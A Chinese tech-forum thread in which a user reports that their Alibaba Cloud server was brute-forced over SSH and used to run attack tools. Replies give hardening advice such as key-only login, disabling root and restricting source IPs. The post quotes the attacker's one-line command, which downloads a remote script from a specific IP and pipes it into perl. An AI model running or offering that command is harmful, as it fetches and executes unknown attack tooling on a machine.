阿里云被人暴力破解了
看了下最近登陆地是法国,那人用这个命令:bash -c echo -e "\033 \033 \033[96m ";wget -qO - 61.14.210.71/.j/sus3|perl下载了一堆爆破工具包到我服务器上,然后用我服务器跑攻击脚本。现在服务器被阿里云判定为恶意攻击,暂时封禁了 太正常了,服务器天天被扫
所以只开 私钥登录 没有类似 cloudflare tunnel 的东西吗?我一般都不暴露 ssh 端口出来。 有点这样的经历挺好的,不然根本理解不了为什么要做那么对防护操作,也理解不了渗透往往只是几个简单的漏洞组合起来的严重后果 只是你自己的云服务器。。。我还以为是阿里云。。。 @webfamer 楼主 ssh 用的弱密码吗?我的阿里云为了方便也开了远程 ssh 登录,端口也没改,不过是强密码,很多年了,看到一直有攻击,一直都没事😄 这标题起的 这标题,云服务器第一件事就是
1. 禁止 root 登录
2. 禁止密码登录,使用 ssh 密钥登录
3. 修改默认 ssh 端口 22 到其他 你咋不说银河系被人暴力破解了 可以加强 ECS 安全组规则防护,限制远程连接服务器的 IP 地址,只允许自己的 IP 连接。
定期修改服务器密码,设置复杂的密码,建议设置用 ssh 密钥方式远程连接服务器。
这样基本就可以防护暴力破解了